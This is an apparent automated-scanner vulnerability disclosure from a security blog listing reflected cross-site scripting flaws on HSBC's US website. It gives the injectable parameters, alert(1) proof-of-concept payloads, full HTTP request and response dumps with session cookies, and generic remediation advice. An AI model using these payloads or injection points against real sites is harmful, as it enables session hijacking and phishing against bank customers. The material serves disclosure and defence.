www.us.hsbc.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86
HSBC Best Practices Listing on XSS.CX Blog 7/12/2011. Hoyt LLC Research comments that all Web Sites have Bugs and its how those risks are managed that define Best or Worst Practices and further observe that hsbc.com has an external facing Vulnerability Management Program that equates to Best Practices in our opinion.
XSS.CX Updated Report is Available Updated Report of July 7, 2011 at July 07 12:57:15 CST 2011.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:06 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:07 GMT Vary: User-Agent,Cookie Content-Length: 5895 Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content=" ...[SNIP]... <script language="javascript"> var date = new Date(); date.setTime(date.getTime()+(365*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:39 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:39 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:10 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:10 GMT Vary: User-Agent,Cookie Content-Length: 27260 Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:11 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:11 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:12 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq; Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:17 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:17 GMT Vary: User-Agent,Cookie Content-Length: 5930 Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:01 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:01 GMT Vary: User-Agent,Cookie Content-Length: 5869 Set-Cookie: USIB2G=0000NJUK_dhXDXnrBgrxo25z8v1:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
GET /1/2/3/business?home=business HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:37 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:38 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000IYmLi2WpMsUOwQlAFSVhodW:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:38 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 45251
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
GET /1/2/3/hsbcpremier?home=premier HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:50 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:50 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=00005eC3CHlmfPLiWLdENsKlFEF:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:50 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 48767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
//--> ...[SNIP]... <noscript> <iframe src="https://fls.doubleclick.net/activityi;src=2176035;type=hsbcp087;cat=hsbcp725;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]... <br /><a style="margin-left: 170px" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=quickaccount.us.hsbc.com&lang;=en" target="_blank"><img alt="This hyperlink allows you to access a non-HSBC website. HSBC Bank USA, N.A. has no control over the linked website and is not liable for your use of it. Please read the terms & conditions, se ...[SNIP]... </a> | <a title="Careers" onclick="window.open('http://www.hsbcusa.com/careers', '_blank', ''); return false;" href="http://www.hsbcusa.com/careers" target="_blank">Careers</a> ...[SNIP]... </a> | <a title="Related Websites" onclick="window.open('http://www.hsbcusa.com/hsbcsites', '_blank', ''); return false;" href="http://www.hsbcusa.com/hsbcsites" target="_blank">Related Websites</a> ...[SNIP]... <noscript> <img name="dcsimg" width="1" height="1" alt=" " src="https://www1.member-hsbc-group.com/dcsz8d5o800000sx01hp9o0d1_6q6k/njs.gif?dcsuri=/nojavascript&WT.js=No" /> </noscript> ...[SNIP]...
GET /1/2/3/hsbcpremier/apply?code=MEP0002714 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:32 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:32 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000RGVjAlg5BaU11WnInqKS4dp:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Start of Fall 08 action tag --> <img height="1" src="https://switch.atdmt.com/action/msrhsc_FallPremierApplyPage_1" width="1" /> <!-- End of Fall08 atction tag --> ...[SNIP]... <!-- Start of Fall 08 Mortgage action tag --> <img height="1" src="https://view.atdmt.com/action/msrhsc_PremierMortgageApplyPage_1" width="1" /> <!-- End of Fall 08 Mortgage action tag --> ...[SNIP]... <br /><a style="margin-left: 170px" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=quickaccount.us.hsbc.com&lang;=en" target="_blank"><img alt="This hyperlink allows you to access a non-HSBC website. HSBC Bank USA, N.A. has no control over the linked website and is not liable for your use of it. Please read the terms & conditions, se ...[SNIP]... </a> | <a title="Careers" onclick="window.open('http://www.hsbcusa.com/careers', '_blank', ''); return false;" href="http://www.hsbcusa.com/careers" target="_blank">Careers</a> ...[SNIP]... </a> | <a title="Related Websites" onclick="window.open('http://www.hsbcusa.com/hsbcsites', '_blank', ''); return false;" href="http://www.hsbcusa.com/hsbcsites" target="_blank">Related Websites</a> ...[SNIP]... <noscript> <img name="dcsimg" width="1" height="1" alt=" " src="https://www1.member-hsbc-group.com/dcsz8d5o800000sx01hp9o0d1_6q6k/njs.gif?dcsuri=/nojavascript&WT.js=No" /> </noscript> ...[SNIP]...
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:05 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:05 GMT Vary: User-Agent,Cookie Content-Length: 26320 Set-Cookie: USIB2G=0000i0ZssoXWrV29Udhywt46pOG:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
GET /1/2/3/personal?home=personal HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:25 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:26 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000XWbA0Ei-ZE8bg9YgTYbxkwa:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:08:25 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 55195
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /1/2/3/contact-us HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:08:47 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:09:47 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000KxsP67T1EzncR8Q9s-Hu6WR:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 47073
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
GET /1/2/3/hsbcpremier/apply HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:32 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:32 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000nfoRvce7Dt5JQT9tlRfz8Nd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:32 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 33927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
